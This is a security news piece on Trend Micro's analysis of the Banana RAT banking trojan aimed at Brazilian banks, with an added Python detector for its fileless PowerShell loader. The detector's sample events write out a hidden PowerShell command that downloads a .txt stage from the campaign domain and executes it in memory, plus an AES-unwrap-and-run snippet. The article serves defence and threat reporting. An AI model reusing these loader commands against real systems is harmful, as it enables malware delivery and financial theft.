Banana RAT: Trend Micro Maps Full Attack Chain of Brazilian Banking Trojan
Trend Micro researchers have reconstructed the complete operational model of Banana RAT, a banking trojan attributed to the SHADOW-WATER-063 cluster that targets Brazilian financial institutions.

Trend Micro's Managed Detection and Response (MDR) team has published a detailed analysis of Banana RAT, a banking trojan operated by the threat cluster tracked as SHADOW-WATER-063. The investigation is notable because researchers recovered both server-side tooling from attacker infrastructure and client-side telemetry from compromised hosts, enabling a full-chain reconstruction of the malware's operation. The findings, released on May 19, 2026, reveal a sophisticated financially motivated campaign exclusively targeting Brazilian financial institutions.
The attack chain begins with victim luring via WhatsApp or phishing URLs, directing targets to download a malicious batch file (Consultar_NF-e.bat) from a campaign-specific domain such as convitemundial2026[.]com. The batch file launches an obfuscated PowerShell command that silently fetches a second-stage payload (msedge.txt) and runs it entirely in memory, so no decrypted file ever touches disk. This fileless execution pattern relies on AES-256-CBC-wrapped payloads and the PowerShell [ScriptBlock]::Create method to evade file-based detection and persistence controls.
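As an added illustration (not code from Trend Micro's report), the following Python scores process command lines or PowerShell script-block log entries against the delivery traits described above, requiring several traits to co-occur before alerting so that routine admin use of bypass flags or .txt downloads does not fire. The sample events are constructed; the indicator families and thresholds are assumptions, not Trend Micro's detection logic.

```python
import re

# Added example: indicator families for the delivery chain the article describes
# (.bat launcher -> hidden PowerShell -> in-memory .txt stage -> AES-CBC unwrap -> ScriptBlock::Create).
INDICATORS = {
    "bat_launcher": re.compile(r"\.bat\b.*powershell", re.I),
    "hidden_or_bypass": re.compile(
        r"-(w(indowstyle)?\s+hidden|e(xecutionpolicy|p)\s+bypass|nop|noni(nteractive)?|enc(odedcommand)?)\b", re.I),
    "remote_text_stage": re.compile(
        r"(DownloadString|Invoke-WebRequest|Invoke-RestMethod|iwr|irm)[^\n]*https?://[^\s'\"]+\.txt", re.I),
    "aes_in_memory": re.compile(r"AesCryptoServiceProvider|Cryptography\.Aes\b|CipherMode\]::CBC|FromBase64String", re.I),
    "scriptblock_create": re.compile(r"\[?ScriptBlock\]?::Create", re.I),
}
STRONG = {"remote_text_stage", "aes_in_memory", "scriptblock_create"}


def score_event(text: str) -> tuple[str, list[str]]:
    """Return (verdict, matched families). One family alone is normal admin activity;
    the loader pattern is flagged only when several families co-occur in a single event."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    if len(hits) >= 3 or len(STRONG.intersection(hits)) >= 2:
        return "alert", hits
    if len(hits) == 2:
        return "suspicious", hits
    return "benign", hits


# Constructed sample events (Sysmon process-creation / PowerShell 4104 style), not real telemetry.
SAMPLE_EVENTS = [
    # 1: the .bat launcher spawning a hidden PowerShell that pulls msedge.txt (domain defanged as in the article)
    "cmd.exe /c C:\\Users\\victim\\Downloads\\Consultar_NF-e.bat && powershell -w hidden -ep bypass -c "
    "\"$s=(New-Object Net.WebClient).DownloadString('https://convitemundial2026[.]com/msedge.txt');"
    "[ScriptBlock]::Create($s).Invoke()\"",
    # 2: script block of a second stage that unwraps an AES-CBC payload and runs it in memory
    "$aes=New-Object System.Security.Cryptography.AesCryptoServiceProvider;"
    "$aes.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aes.Key=[Convert]::FromBase64String($k);"
    "[ScriptBlock]::Create($plain).Invoke()",
    # 3: routine admin use of -ExecutionPolicy Bypass, a single family only
    "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\nightly_backup.ps1",
    # 4: a plain .txt download on its own, also a single family
    "powershell -NoProfile -Command \"Invoke-WebRequest https://example.com/readme.txt -OutFile readme.txt\"",
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        verdict, hits = score_event(event)
        print(f"{verdict:10s} {hits}")
```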
On the server side, the operator maintains a clean, unobfuscated PowerShell banker as a master source file. This source feeds a FastAPI-based crypter service that applies multiple obfuscation layers and produces unique, polymorphic builds. The crypter maintains a pre-generated pool of 100 to 200 ready builds at all times, each published as payload.php and consumed exactly once per victim request, ensuring every delivered sample is byte-unique. A separate analytics dashboard provides real-time visibility into campaign reach by country, ISP, operating system, and client.
Once active, the malware establishes persistence and opens a TCP session to the operator's command-and-control host on port 443. The client functions as a full remote fraud and surveillance module, combining real-time screen streaming, operator-driven input control, banking-aware overlay injection, Pix QR transaction manipulation, and continuous keylogging. These capabilities enable interactive credential theft and unauthorized financial transaction execution, with a Pix QR interception subsystem built specifically for the Brazilian market.
The infrastructure design deliberately separates the delivery infrastructure from the command-and-control infrastructure. If the delivery host is taken down, existing infections continue communicating with the C&C host unaffected; if the C&C host is disrupted, the delivery pipeline remains intact for the next campaign. This separation gives the operator operational resilience and complicates takedown efforts, since disrupting either half alone does not stop the operation.
Trend Micro attributes the operation with high confidence to Brazilian Portuguese-speaking operators exhibiting Tetrade-adjacent tradecraft, with exclusive targeting of 16 Brazilian financial institutions. The company is coordinating with the Federação Brasileira de Bancos (FEBRABAN) to share threat intelligence and support the protection of Brazilian financial institutions and their customers.
The analysis underscores the growing sophistication of banking trojans in Latin America, where financial malware operators continue to innovate with fileless execution, polymorphic payload generation, and targeted fraud capabilities. The full report provides defenders with a rare end-to-end view of a live banking trojan operation, from build server to endpoint compromise.